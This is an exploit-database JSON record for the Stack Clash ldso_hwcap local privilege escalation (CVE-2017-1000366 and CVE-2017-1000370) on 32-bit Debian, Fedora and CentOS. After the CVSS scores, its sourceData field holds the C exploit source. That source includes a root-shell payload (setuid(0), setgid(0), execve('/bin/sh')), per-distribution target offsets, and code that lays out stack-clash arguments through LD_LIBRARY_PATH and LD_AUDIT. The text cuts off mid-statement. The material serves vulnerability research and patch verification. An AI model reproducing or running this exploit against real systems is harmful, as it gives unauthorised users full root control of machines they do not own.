"description": "\nLinux Kernel (Debian 78910 Fedora 232425 CentOS 5.35.116.06.87.2.1511) - ldso_hwcap Stack Clash Local Privilege Escalation", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-28T00:00:00", "type": "exploitpack", "title": "Linux Kernel (Debian 78910 Fedora 232425 CentOS 5.35.116.06.87.2.1511) - ldso_hwcap Stack Clash Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000370", "CVE-2017-1000366"], "modified": "2017-06-28T00:00:00", "id": "EXPLOITPACK:DFB54027B0CAC8B9E041940F5800AB1F", "href": "", "sourceData": "/*\n * Linux_ldso_hwcap.c for CVE-2017-1000366, CVE-2017-1000370\n * Copyright (C) 2017 Qualys, Inc.\n *\n * my_important_hwcaps() adapted from elf/dl-hwcaps.c,\n * part of the GNU C Library:\n * Copyright (C) 2012-2017 Free Software Foundation, Inc.\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see <http://www.gnu.org/licenses/>.\n */\n\n/**\ncat > la.c << \"EOF\"\nstatic void __attribute__ ((constructor)) _init (void) {\n __asm__ __volatile__ (\n \"addl $64, %esp;\"\n // setuid(0);\n \"movl $23, %eax;\"\n \"movl $0, %ebx;\"\n \"int $0x80;\"\n // setgid(0);\n \"movl $46, %eax;\"\n \"movl $0, %ebx;\"\n \"int $0x80;\"\n // dup2(0, 1);\n \"movl $63, %eax;\"\n \"movl $0, %ebx;\"\n \"movl $1, %ecx;\"\n \"int $0x80;\"\n // dup2(0, 2);\n \"movl $63, %eax;\"\n \"movl $0, %ebx;\"\n \"movl $2, %ecx;\"\n \"int $0x80;\"\n // execve(\"/bin/sh\");\n \"movl $11, %eax;\"\n \"pushl $0x0068732f;\"\n \"pushl $0x6e69622f;\"\n \"movl %esp, %ebx;\"\n \"movl $0, %edx;\"\n \"pushl %edx;\"\n \"pushl %ebx;\"\n \"movl %esp, %ecx;\"\n \"int $0x80;\"\n // exit(0);\n \"movl $1, %eax;\"\n \"movl $0, %ebx;\"\n \"int $0x80;\"\n );\n}\nEOF\ngcc -fpic -shared -nostdlib -Os -s -o la.so la.c\nxxd -i la.so > la.so.h\n**/\n\n#define _GNU_SOURCE\n#include <assert.h>\n#include <elf.h>\n#include <fcntl.h>\n#include <limits.h>\n#include <link.h>\n#include <signal.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/param.h>\n#include <sys/resource.h>\n#include <sys/stat.h>\n#include <sys/time.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <unistd.h>\n\n#define PAGESZ ((size_t)4096)\n#define STACK_ALIGN ((size_t)16)\n#define MALLOC_ALIGN ((size_t)8)\n\n#define MMAP_BASE ((uintptr_t)0x40000000)\n#define MMAP_RAND ((size_t)1<<20)\n\n#define STACK_BASE ((uintptr_t)0xC0000000)\n#define STACK_RAND ((size_t)8<<20)\n\n#define MAX_ARG_STRLEN ((size_t)128<<10)\n#define MAX_ARG_STRINGS ((size_t)0x7FFFFFFF)\n\nstatic const struct target * target;\nstatic const struct target {\n const char * name;\n size_t memalign_up;\n size_t nsystem_dirs_len;\n size_t sizeof_system_dirs;\n const char * repl_lib;\n int ignore_lib;\n int ignore_origin;\n} targets[] = {\n {\n .name = \"Debian 7 (wheezy)\",\n .memalign_up = PAGESZ,\n .nsystem_dirs_len = 4,\n .sizeof_system_dirs = sizeof(\"/lib/i386-linux-gnu/\\0\" \"/usr/lib/i386-linux-gnu/\\0\" \"/lib/\\0\" \"/usr/lib/\"),\n .repl_lib = \"lib/i386-linux-gnu\",\n .ignore_lib = 0,\n .ignore_origin = 0,\n },\n {\n .name = \"Debian 8 (jessie)\",\n .memalign_up = PAGESZ,\n .nsystem_dirs_len = 4,\n .sizeof_system_dirs = sizeof(\"/lib/i386-linux-gnu/\\0\" \"/usr/lib/i386-linux-gnu/\\0\" \"/lib/\\0\" \"/usr/lib/\"),\n .repl_lib = \"lib/i386-linux-gnu\",\n .ignore_lib = 0,\n .ignore_origin = 0,\n },\n {\n .name = \"Debian 9 (stretch)\",\n .memalign_up = 2 * PAGESZ,\n .nsystem_dirs_len = 4,\n .sizeof_system_dirs = sizeof(\"/lib/i386-linux-gnu/\\0\" \"/usr/lib/i386-linux-gnu/\\0\" \"/lib/\\0\" \"/usr/lib/\"),\n .repl_lib = \"lib/i386-linux-gnu\",\n .ignore_lib = 0,\n .ignore_origin = 0,\n },\n {\n .name = \"Debian 10 (buster)\",\n .memalign_up = 2 * PAGESZ,\n .nsystem_dirs_len = 4,\n .sizeof_system_dirs = sizeof(\"/lib/i386-linux-gnu/\\0\" \"/usr/lib/i386-linux-gnu/\\0\" \"/lib/\\0\" \"/usr/lib/\"),\n .repl_lib = \"lib/i386-linux-gnu\",\n .ignore_lib = 0,\n .ignore_origin = 0,\n },\n {\n .name = \"Fedora 23 (Server Edition)\",\n .memalign_up = PAGESZ,\n .nsystem_dirs_len = 2,\n .sizeof_system_dirs = sizeof(\"/lib/\\0\" \"/usr/lib/\"),\n .repl_lib = \"lib\",\n .ignore_lib = 0,\n .ignore_origin = 0,\n },\n {\n .name = \"Fedora 24 (Server Edition)\",\n .memalign_up = PAGESZ,\n .nsystem_dirs_len = 2,\n .sizeof_system_dirs = sizeof(\"/lib/\\0\" \"/usr/lib/\"),\n .repl_lib = \"lib\",\n .ignore_lib = 0,\n .ignore_origin = 0,\n },\n {\n .name = \"Fedora 25 (Server Edition)\",\n .memalign_up = 2 * PAGESZ,\n .nsystem_dirs_len = 2,\n .sizeof_system_dirs = sizeof(\"/lib/\\0\" \"/usr/lib/\"),\n .repl_lib = \"lib\",\n .ignore_lib = 0,\n .ignore_origin = 0,\n },\n {\n .name = \"CentOS 5.3 (Final)\",\n .memalign_up = PAGESZ,\n .nsystem_dirs_len = 2,\n .sizeof_system_dirs = sizeof(\"/lib/\\0\" \"/usr/lib/\"),\n .repl_lib = \"lib\",\n .ignore_lib = 1,\n .ignore_origin = 0,\n },\n {\n .name = \"CentOS 5.11 (Final)\",\n .memalign_up = PAGESZ,\n .nsystem_dirs_len = 2,\n .sizeof_system_dirs = sizeof(\"/lib/\\0\" \"/usr/lib/\"),\n .repl_lib = \"lib\",\n .ignore_lib = 0,\n .ignore_origin = 1,\n },\n {\n .name = \"CentOS 6.0 (Final)\",\n .memalign_up = PAGESZ,\n .nsystem_dirs_len = 2,\n .sizeof_system_dirs = sizeof(\"/lib/\\0\" \"/usr/lib/\"),\n .repl_lib = \"lib\",\n .ignore_lib = 0,\n .ignore_origin = 0,\n },\n {\n .name = \"CentOS 6.8 (Final)\",\n .memalign_up = PAGESZ,\n .nsystem_dirs_len = 2,\n .sizeof_system_dirs = sizeof(\"/lib/\\0\" \"/usr/lib/\"),\n .repl_lib = \"lib\",\n .ignore_lib = 0,\n .ignore_origin = 1,\n },\n {\n .name = \"CentOS 7.2.1511 (AltArch)\",\n .memalign_up = PAGESZ,\n .nsystem_dirs_len = 2,\n .sizeof_system_dirs = sizeof(\"/lib/\\0\" \"/usr/lib/\"),\n .repl_lib = \"lib\",\n .ignore_lib = 0,\n .ignore_origin = 0,\n },\n};\n\n#define die() do { \\\n printf(\"died in %s: %u\\n\", __func__, __LINE__); \\\n exit(EXIT_FAILURE); \\\n} while (0)\n\nstatic const ElfW(auxv_t) * my_auxv;\n\nstatic unsigned long int\nmy_getauxval (const unsigned long int type)\n{\n const ElfW(auxv_t) * p;\n\n if (!my_auxv) die();\n for (p = my_auxv; p->a_type != AT_NULL; p++)\n if (p->a_type == type)\n return p->a_un.a_val;\n die();\n}\n\nstatic size_t\nget_elf_mmaps(const char * const binary)\n{\n if (!binary) die();\n if (*binary != '/') die();\n struct stat st;\n if (stat(binary, &st)) die();\n if (!S_ISREG(st.st_mode)) die();\n if (st.st_size <= 0) die();\n #define SAFESZ ((size_t)64<<20)\n if (st.st_size >= (ssize_t)SAFESZ) die();\n const size_t size = st.st_size;\n printf(\"%s %zu mmaps \", binary, size);\n\n const int fd = open(binary, O_RDONLY);\n if (fd <= -1) {\n const size_t mmaps = (size + PAGESZ-1) & ~(PAGESZ-1);\n printf(\"%zu (unreadable)\\n\", mmaps);\n return mmaps;\n }\n uint8_t * const buf = malloc(size);\n if (!buf) die();\n if (read(fd, buf, size) != (ssize_t)size) die();\n if (close(fd)) die();\n\n if (size <= sizeof(ElfW(Ehdr))) die();\n const ElfW(Ehdr) * const ehdr = (const ElfW(Ehdr) *)buf;\n if (ehdr->e_ident[EI_MAG0] != ELFMAG0) die();\n if (ehdr->e_ident[EI_MAG1] != ELFMAG1) die();\n if (ehdr->e_ident[EI_MAG2] != ELFMAG2) die();\n if (ehdr->e_ident[EI_MAG3] != ELFMAG3) die();\n if (ehdr->e_ident[EI_CLASS] != ELFCLASS32) die();\n if (ehdr->e_ident[EI_DATA] != ELFDATA2LSB) die();\n if (ehdr->e_machine != EM_386) die();\n if (ehdr->e_version != EV_CURRENT) die();\n if (ehdr->e_ehsize != sizeof(ElfW(Ehdr))) die();\n if (ehdr->e_phentsize != sizeof(ElfW(Phdr))) die();\n if (ehdr->e_shentsize != sizeof(ElfW(Shdr))) die();\n if (ehdr->e_phoff <= 0 || ehdr->e_phoff >= size) die();\n if (ehdr->e_shoff <= 0 || ehdr->e_shoff >= size) die();\n if (ehdr->e_phnum > (size - ehdr->e_phoff) / sizeof(ElfW(Phdr))) die();\n if (ehdr->e_shnum > (size - ehdr->e_shoff) / sizeof(ElfW(Shdr))) die();\n\n if (ehdr->e_type != ET_DYN) {\n if (ehdr->e_type != ET_EXEC) die();\n const size_t mmaps = 0;\n printf(\"%zu (executable)\\n\", mmaps);\n free(buf);\n return mmaps;\n }\n\n uintptr_t first_map_start = UINTPTR_MAX;\n uintptr_t last_map_end = 0;\n unsigned int i;\n for (i = 0; i < ehdr->e_phnum; i++) {\n const ElfW(Phdr) * const phdr = (const ElfW(Phdr) *)(buf + ehdr->e_phoff) + i;\n if (phdr->p_type != PT_LOAD) continue;\n\n if (phdr->p_offset >= size) die();\n if (phdr->p_filesz > size - phdr->p_offset) die();\n if (phdr->p_filesz > phdr->p_memsz) die();\n if (phdr->p_vaddr >= STACK_BASE) die();\n if (phdr->p_memsz <= 0) die();\n if (phdr->p_memsz >= SAFESZ) die();\n #undef SAFESZ\n if (phdr->p_align != PAGESZ) die();\n\n const uintptr_t map_start = phdr->p_vaddr & ~(PAGESZ-1);\n if (map_start >= UINTPTR_MAX) die();\n if (map_start < last_map_end) die();\n\n const uintptr_t map_end = (phdr->p_vaddr + phdr->p_memsz + PAGESZ-1) & ~(PAGESZ-1);\n if (map_end <= map_start) die();\n if (map_end <= 0) die();\n\n if (first_map_start >= UINTPTR_MAX) {\n first_map_start = map_start;\n }\n last_map_end = map_end;\n\n switch (phdr->p_flags) {\n case PF_R | PF_X:\n break;\n case PF_R | PF_W:\n if (map_start <= first_map_start) die();\n break;\n default:\n die();\n }\n }\n if (first_map_start >= UINTPTR_MAX) die();\n if (last_map_end <= 0) die();\n if (last_map_end <= first_map_start) die();\n const size_t mmaps = last_map_end - first_map_start;\n printf(\"%zu (%sshared object)\\n\", mmaps, first_map_start ? \"prelinked \" : \"\");\n free(buf);\n return mmaps;\n}\n\nstatic const char my_x86_cap_flags[32][8] = {\n \"fpu\", \"vme\", \"de\", \"pse\", \"tsc\", \"msr\", \"pae\", \"mce\",\n \"cx8\", \"apic\", \"10\", \"sep\", \"mtrr\", \"pge\", \"mca\", \"cmov\",\n \"pat\", \"pse36\", \"pn\", \"clflush\", \"20\", \"dts\", \"acpi\", \"mmx\",\n \"fxsr\", \"sse\", \"sse2\", \"ss\", \"ht\", \"tm\", \"ia64\", \"pbe\"\n};\n\nstatic const char my_x86_platforms[4][5] = {\n \"i386\", \"i486\", \"i586\", \"i686\"\n};\n\nstatic inline const char *\nmy_hwcap_string (const unsigned int idx)\n{\n if (idx >= sizeof(my_x86_cap_flags) / sizeof(my_x86_cap_flags[0])) die();\n return my_x86_cap_flags[idx];\n}\n\nstruct my_important_hwcaps {\n unsigned long hwcap_mask;\n size_t max_capstrlen;\n size_t pointers;\n size_t strings;\n size_t search_dirs;\n size_t search_dirs_0;\n};\n\nstruct my_link_map {\n const ElfW(Phdr) * l_phdr;\n ElfW(Half) l_phnum;\n ElfW(Addr) l_addr;\n};\n\n/* We want to cache information about the searches for shared objects. */\n\nenum r_dir_status { unknown, nonexisting, existing };\n\nstruct r_search_path_elem\n {\n /* This link is only used in the `all_dirs' member of `r_search_path'. */\n struct r_search_path_elem *next;\n\n /* Strings saying where the definition came from. */\n const char *what;\n const char *where;\n\n /* Basename for this search path element. The string must end with\n a slash character. */\n const char *dirname;\n size_t dirnamelen;\n\n enum r_dir_status status[0];\n };\n\nstruct r_strlenpair\n {\n const char *str;\n size_t len;\n };\n\n/* Return an array of useful/necessary hardware capability names. */\nstatic struct my_important_hwcaps\nmy_important_hwcaps (const char * const platform, const size_t platform_len,\n const uint64_t hwcap, const uint64_t hwcap_mask,\n const struct my_link_map * sysinfo_map)\n{\n static const struct my_important_hwcaps err;\n /* Determine how many important bits are set. */\n uint64_t masked = hwcap & hwcap_mask;\n size_t cnt = platform != NULL;\n size_t n, m;\n size_t total;\n struct r_strlenpair *result;\n\n /* Count the number of bits set in the masked value. */\n for (n = 0; (~((1ULL << n) - 1) & masked) != 0; ++n)\n if ((masked & (1ULL << n)) != 0)\n ++cnt;\n\n /* The system-supplied DSO can contain a note of type 2, vendor \"GNU\".\n This gives us a list of names to treat as fake hwcap bits. */\n\n const char *dsocaps = NULL;\n size_t dsocapslen = 0;\n if (sysinfo_map != NULL)\n {\n const ElfW(Phdr) *const phdr = sysinfo_map->l_phdr;\n const ElfW(Word) phnum = sysinfo_map->l_phnum;\n uint_fast16_t i;\n for (i = 0; i < phnum; ++i)\n if (phdr[i].p_type == PT_NOTE)\n {\n const ElfW(Addr) start = (phdr[i].p_vaddr\n + sysinfo_map->l_addr);\n /* The standard ELF note layout is exactly as the anonymous struct.\n The next element is a variable length vendor name of length\n VENDORLEN (with a real length rounded to ElfW(Word)), followed\n by the data of length DATALEN (with a real length rounded to\n ElfW(Word)). */\n const struct\n {\n ElfW(Word) vendorlen;\n ElfW(Word) datalen;\n ElfW(Word) type;\n } *note = (const void *) start;\n while ((ElfW(Addr)) (note + 1) - start < phdr[i].p_memsz)\n {\n#define ROUND(len) (((len) + sizeof (ElfW(Word)) - 1) & -sizeof (ElfW(Word)))\n /* The layout of the type 2, vendor \"GNU\" note is as follows:\n .long <Number of capabilities enabled by this note>\n .long <Capabilities mask> (as mask >> _DL_FIRST_EXTRA).\n .byte <The bit number for the next capability>\n .asciz <The name of the capability>. */\n if (note->type == NT_GNU_HWCAP\n && note->vendorlen == sizeof \"GNU\"\n && !memcmp ((note + 1), \"GNU\", sizeof \"GNU\")\n && note->datalen > 2 * sizeof (ElfW(Word)) + 2)\n {\n const ElfW(Word) *p = ((const void *) (note + 1)\n + ROUND (sizeof \"GNU\"));\n cnt += *p++;\n ++p; /* Skip mask word. */\n dsocaps = (const char *) p; /* Pseudo-string \"<b>name\" */\n dsocapslen = note->datalen - sizeof *p * 2;\n break;\n }\n note = ((const void *) (note + 1)\n + ROUND (note->vendorlen) + ROUND (note->datalen));\n#undef ROUND\n }\n if (dsocaps != NULL)\n break;\n }\n }\n\n /* For TLS enabled builds always add 'tls'. */\n ++cnt;\n\n /* Create temporary data structure to generate result table. */\n if (cnt < 2) return err;\n if (cnt >= 32) return err;\n struct r_strlenpair temp[cnt];\n m = 0;\n if (dsocaps != NULL)\n {\n /* dsocaps points to the .asciz string, and -1 points to the mask\n .long just before the string. */\n const ElfW(Word) mask = ((const ElfW(Word) *) dsocaps)[-1];\n size_t len;\n const char *p;\n for (p = dsocaps; p < dsocaps + dsocapslen; p += len + 1)\n {\n uint_fast8_t bit = *p++;\n len = strlen (p);\n\n /* Skip entries that are not enabled in the mask word. */\n if (mask & ((ElfW(Word)) 1 << bit))\n {\n temp[m].str = p;\n temp[m].len = len;\n ++m;\n }\n else\n --cnt;\n }\n }\n for (n = 0; masked != 0; ++n)\n if ((masked & (1ULL << n)) != 0)\n {\n temp[m].str = my_hwcap_string (n);\n temp[m].len = strlen (temp[m].str);\n masked ^= 1ULL << n;\n ++m;\n }\n if (platform != NULL)\n {\n temp[m].str = platform;\n temp[m].len = platform_len;\n ++m;\n }\n\n temp[m].str = \"tls\";\n temp[m].len = 3;\n ++m;\n\n assert (m == cnt);\n\n /* Determine the total size of all strings together. */\n if (cnt == 1)\n total = temp[0].len + 1;\n else\n {\n total = temp[0].len + temp[cnt - 1].len + 2;\n if (cnt > 2)\n {\n total <<= 1;\n for (n = 1; n + 1 < cnt; ++n)\n total += temp[n].len + 1;\n if (cnt > 3\n && (cnt >= sizeof (size_t) * 8\n || total + (sizeof (*result) << 3)\n >= (1UL << (sizeof (size_t) * 8 - cnt + 3))))\n return err;\n\n total <<= cnt - 3;\n }\n }\n\n /* The result structure: we use a very compressed way to store the\n various combinations of capability names. */\n const size_t _sz = 1 << cnt;\n\n /* Now we are ready to install the string pointers and length. */\n size_t max_capstrlen = 0;\n n = cnt;\n do\n {\n const size_t mask = 1 << --n;\n for (m = 1 << cnt; m > 0; ) {\n if ((--m & mask) != 0)\n max_capstrlen += temp[n].len + 1;\n break;\n }\n }\n while (n != 0);\n\n const size_t round_size =\n (2 * sizeof (struct r_search_path_elem) - 1 + _sz * sizeof (enum r_dir_status))\n / sizeof (struct r_search_path_elem);\n if (hwcap_mask > ULONG_MAX) die();\n\n const struct my_important_hwcaps ret = {\n .hwcap_mask = hwcap_mask,\n .max_capstrlen = max_capstrlen,\n .pointers = _sz * sizeof (*result),\n .strings = total,\n .search_dirs = (target->nsystem_dirs_len + 1) * sizeof (struct r_search_path_elem *),\n .search_dirs_0 = target->sizeof_system_dirs * round_size * sizeof (struct r_search_path_elem)\n };\n return ret;\n}\n\nstatic size_t\nmy_bsearch(const void * const key,\n const void * const base, const size_t nmemb, const size_t size,\n int (* const compar)(const void *, const void *))\n{\n if (!key) die();\n if (!size) die();\n if (!compar) die();\n if (nmemb >= SSIZE_MAX / size) die();\n if (!base != !nmemb) die();\n if (!base || !nmemb) return 0;\n\n size_t low = 0;\n size_t high = nmemb - 1;\n while (low <= high) {\n const size_t mid = low + (high - low) / 2;\n if (mid >= nmemb) die();\n const int cond = compar(key, base + mid * size);\n switch (cond) {\n case 0:\n return mid;\n case -1:\n if (mid <= 0) {\n if (mid != 0) die();\n if (low != 0) die();\n return low;\n }\n high = mid - 1;\n break;\n case +1:\n low = mid + 1;\n break;\n default:\n die();\n }\n }\n if (low > nmemb) die();\n return low;\n}\n\nstatic int\ncmp_important_hwcaps(const void * const _a, const void * const _b)\n{\n const struct my_important_hwcaps * const a = _a;\n const struct my_important_hwcaps * const b = _b;\n\n if (a->strings < b->strings) return -1;\n if (a->strings > b->strings) return +1;\n\n if (a->pointers < b->pointers) return -1;\n if (a->pointers > b->pointers) return +1;\n\n if (a->search_dirs_0 < b->search_dirs_0) return -1;\n if (a->search_dirs_0 > b->search_dirs_0) return +1;\n\n if (a->max_capstrlen < b->max_capstrlen) return -1;\n if (a->max_capstrlen > b->max_capstrlen) return +1;\n\n return 0;\n}\n\nstruct audit_list\n{\n const char *name;\n struct audit_list *next;\n};\n\nint\nmain(const int my_argc, const char * const my_argv[], const char * const my_envp[])\n{\n {\n const char * const * p = my_envp;\n while (*p++) ;\n my_auxv = (const void *)p;\n }\n if (my_getauxval(AT_PAGESZ) != PAGESZ) die();\n {\n struct timeval tv;\n if (gettimeofday(&tv, NULL)) die();\n srandom(getpid() ^ tv.tv_sec ^ tv.tv_usec);\n }\n if (my_argc != 1+2) {\n printf(\"Usage: %s target binary\\n\", my_argv[0]);\n size_t i;\n for (i = 0; i < sizeof(targets)/sizeof(*targets); i++) {\n printf(\"Target %zu %s\\n\", i, targets[i].name);\n }\n die();\n }\n {\n const size_t i = strtoul(my_argv[1], NULL, 10);\n if (i >= sizeof(targets)/sizeof(*targets)) die();\n target = targets + i;\n printf(\"Target %zu %s\\n\", i, target->name);\n }\n printf(\"mau %zu nsd %zu ssd %zu rl %s il %d io %d\\n\",\n target->memalign_up, target->nsystem_dirs_len, target->sizeof_system_dirs,\n target->repl_lib, target->ignore_lib, target->ignore_origin);\n\n if (target->memalign_up % PAGESZ) die();\n if (target->ignore_lib < 0 || target->ignore_origin < 0) die();\n if (target->ignore_lib > 1 || target->ignore_origin > 1) die();\n\n const char * const binary = realpath(my_argv[2], NULL);\n if (!binary) die();\n if (*binary != '/') die();\n if (access(binary, X_OK)) die();\n\n const char * const slash = strrchr(binary, '/');\n if (!slash) die();\n if (slash <= binary) die();\n const char * const origin = strndup(binary, slash - binary);\n if (!origin) die();\n printf(\"origin %s (%zu)\\n\", origin, strlen(origin));\n\n const char * const platform = (const void *)my_getauxval(AT_PLATFORM);\n if (!platform) die();\n const size_t platform_len = strlen(platform);\n if (platform_len != 4) die();\n {\n size_t i;\n for (i = 0; ; i++) {\n if (i >= sizeof(my_x86_platforms) / sizeof(my_x86_platforms[0])) die();\n if (strcmp(platform, my_x86_platforms[i]) == 0) break;\n }\n }\n const struct {\n const char * str;\n size_t len;\n size_t repl_len;\n } DSTs[] = {\n #define DST_LIB \"LIB\"\n { DST_LIB, strlen(DST_LIB), strlen(target->repl_lib) },\n #define DST_PLATFORM \"PLATFORM\"\n { DST_PLATFORM, strlen(DST_PLATFORM), platform_len }\n };\n size_t repl_max = target->ignore_origin ? 0 : strlen(origin);\n {\n size_t i;\n for (i = target->ignore_lib ? 1 : 0; i < sizeof(DSTs)/sizeof(*DSTs); i++) {\n if (repl_max < DSTs[i].repl_len)\n repl_max = DSTs[i].repl_len;\n }\n }\n printf(\"repl_max %zu\\n\", repl_max);\n if (repl_max < 4) die();\n\n const ElfW(Ehdr) * const sysinfo_dso = (const void *)my_getauxval(AT_SYSINFO_EHDR);\n if (!sysinfo_dso) die();\n struct my_link_map sysinfo_map = {\n .l_phdr = (const void *)sysinfo_dso + sysinfo_dso->e_phoff,\n .l_phnum = sysinfo_dso->e_phnum,\n .l_addr = ULONG_MAX\n };\n {\n uint_fast16_t i;\n for (i = 0; i < sysinfo_map.l_phnum; ++i) {\n const ElfW(Phdr) * const ph = &sysinfo_map.l_phdr[i];\n if (ph->p_type == PT_LOAD) {\n if (sysinfo_map.l_addr == ULONG_MAX)\n sysinfo_map.l_addr = ph->p_vaddr;\n }\n }\n }\n if (sysinfo_map.l_addr == ULONG_MAX) die();\n sysinfo_map.l_addr = (ElfW(Addr))sysinfo_dso - sysinfo_map.l_addr;\n\n const unsigned long hwcap = my_getauxval(AT_HWCAP);\n if (!hwcap) die();\n struct my_important_hwcaps * important_hwcaps = NULL;\n size_t num_important_hwcaps = 0;\n {\n size_t max_important_hwcaps = 0;\n uint32_t hwcap_mask = 1;\n do {\n if (hwcap_mask & ~hwcap) continue;\n const uint64_t popcount = __builtin_popcount(hwcap_mask);\n if (popcount < 1) die();\n if (popcount > 32) die();\n if ((((2+1) * (2*2 + popcount)) << (popcount-1)) + PAGESZ\n >= MAX_ARG_STRLEN + (MAX_ARG_STRLEN / (4+1)) * (repl_max - (target->ignore_lib ? 7 : 4))) continue;\n\n const struct my_important_hwcaps ihc = my_important_hwcaps(platform, platform_len, hwcap, hwcap_mask, &sysinfo_map);\n if (!ihc.pointers) die();\n\n const size_t idx = my_bsearch(&ihc, important_hwcaps, num_important_hwcaps, sizeof(struct my_important_hwcaps), cmp_important_hwcaps);\n if (idx > num_important_hwcaps) die();\n\n if (idx == num_important_hwcaps || cmp_important_hwcaps(&ihc, important_hwcaps + idx)) {\n if (num_important_hwcaps >= max_important_hwcaps) {\n if (num_important_hwcaps != max_important_hwcaps) die();\n if (max_important_hwcaps >= 65536) die();\n max_important_hwcaps += 256;\n\n if (num_important_hwcaps >= max_important_hwcaps) die();\n important_hwcaps = realloc(important_hwcaps, max_important_hwcaps * sizeof(struct my_important_hwcaps));\n if (!important_hwcaps) die();\n }\n memmove(important_hwcaps + idx + 1, important_hwcaps + idx, (num_important_hwcaps - idx) * sizeof(struct my_important_hwcaps));\n important_hwcaps[idx] = ihc;\n num_important_hwcaps++;\n }\n } while (++hwcap_mask);\n }\n printf(\"num_important_hwcaps %zu\\n\", num_important_hwcaps);\n\n static struct {\n double probability;\n struct my_important_hwcaps ihc;\n size_t gwr, dst, cnt;\n } best;\n\n #define LIB \"/lib\"\n #define SEP_LIB \":\" LIB\n #define LLP \"LD_LIBRARY_PATH=\"\n static char llp[MAX_ARG_STRLEN];\n #define MAX_GWR ((sizeof(llp) - (sizeof(LLP)-1 + sizeof(SEP_LIB)-1 + 1)) & ~(MALLOC_ALIGN-1))\n size_t gwr;\n for (gwr = MAX_GWR; gwr >= 128; gwr -= MALLOC_ALIGN) {\n size_t dst;\n for (dst = 0; dst < sizeof(DSTs)/sizeof(*DSTs); dst++) {\n const size_t cnt = (MAX_GWR - gwr) / (1 + DSTs[dst].len + 1);\n const size_t gpj = (sizeof(SEP_LIB)-1 + MAX_GWR + cnt * (repl_max - (target->ignore_lib ? 7 : 4)) + 1 + STACK_ALIGN-1) & ~(STACK_ALIGN-1);\n const size_t bwr = (sizeof(SEP_LIB)-1 + cnt * (DSTs[dst].repl_len + 1)) + ((MAX_GWR - gwr) - cnt * (1 + DSTs[dst].len + 1)) + 1;\n\n const struct my_important_hwcaps key = { .strings = gwr + bwr };\n if (key.pointers) die();\n\n size_t idx = my_bsearch(&key, important_hwcaps, num_important_hwcaps, sizeof(struct my_important_hwcaps), cmp_important_hwcaps);\n for (; idx < num_important_hwcaps; idx++) {\n const struct my_important_hwcaps ihc = important_hwcaps[idx];\n if (ihc.strings < gwr + bwr) die();\n if (ihc.max_capstrlen % MALLOC_ALIGN >= sizeof(\"/..\")) continue;\n if (ihc.search_dirs_0 >= STACK_RAND) continue;\n\n const size_t min = MIN(gwr, ihc.pointers);\n if (gpj < min + ihc.strings + ihc.search_dirs + 2 * target->memalign_up + 2 * PAGESZ + (target->ignore_origin ? 0 : PATH_MAX)) continue;\n\n const double probability =\n (double)((uint64_t)(STACK_RAND - ihc.search_dirs_0) * (uint64_t)min) /\n (double)((uint64_t)STACK_RAND * (uint64_t)(MMAP_RAND + (STACK_RAND - ihc.search_dirs_0)));\n if (best.probability < probability) {\n best.probability = probability;\n best.ihc = ihc;\n best.gwr = gwr;\n best.dst = dst;\n best.cnt = cnt;\n printf(\"len %zu ihcp %zu ihcs %zu sd %zu sd0 %zu gpj %zu gwr %zu bwr %zu cnt %zu dst %zu repl %zu probability 1/%zu (%.10g) mask %lx\\n\",\n ihc.max_capstrlen, ihc.pointers, ihc.strings, ihc.search_dirs, ihc.search_dirs_0, gpj, gwr, bwr, cnt, DSTs[dst].len, DSTs[dst].repl_len,\n (size_t)(1 / probability), probability, ihc.hwcap_mask);\n }\n }\n }\n }\n if (!best.probability) die();\n if (STACK_BASE <= MMAP_BASE) die();\n const size_t mmap_size = ((STACK_BASE - MMAP_BASE) / 2) - MMAP_RAND / 2\n - (get_elf_mmaps(binary) + get_elf_mmaps(\"/lib/ld-linux.so.2\") + best.ihc.pointers + best.ihc.strings + best.ihc.search_dirs);\n const size_t stack_size = ((STACK_BASE - MMAP_BASE) / 2) - ((STACK_RAND + best.ihc.search_dirs_0) / 2);\n printf(\"mmap_size %zu stack_size %zu\\n\", mmap_size, stack_size);\n\n #define REL_LA \"a\"\n #define LDA \"LD_AUDIT=\"\n static char lda[MAX_ARG_STRLEN];\n #define MAX_RLDAS ((sizeof(lda) - sizeof(LDA)) / sizeof(REL_LA))\n if (sizeof(struct audit_list) % MALLOC_ALIGN) die();\n const size_t ldas = (mmap_size / sizeof(struct audit_list)) / MAX_RLDAS;\n if (ldas >= MAX_ARG_STRINGS / 3) die();\n\n #define INITIAL_STACK_EXPANSION (131072UL)\n const size_t pads = INITIAL_STACK_EXPANSION / sizeof(char *) - ldas;\n if (pads >= INITIAL_STACK_EXPANSION / sizeof(char *)) die();\n if (pads >= MAX_ARG_STRINGS / 3) die();\n static char pad[MAX_ARG_STRLEN];\n {\n const size_t padl = (stack_size - sizeof(llp) - ldas * (sizeof(lda) + sizeof(char *)) - pads * sizeof(char *)) / pads;\n if (padl >= sizeof(pad)) die();\n if (padl <= 0) die();\n memset(pad, ' ', padl-1);\n printf(\"ldas %zu pads %zu padl 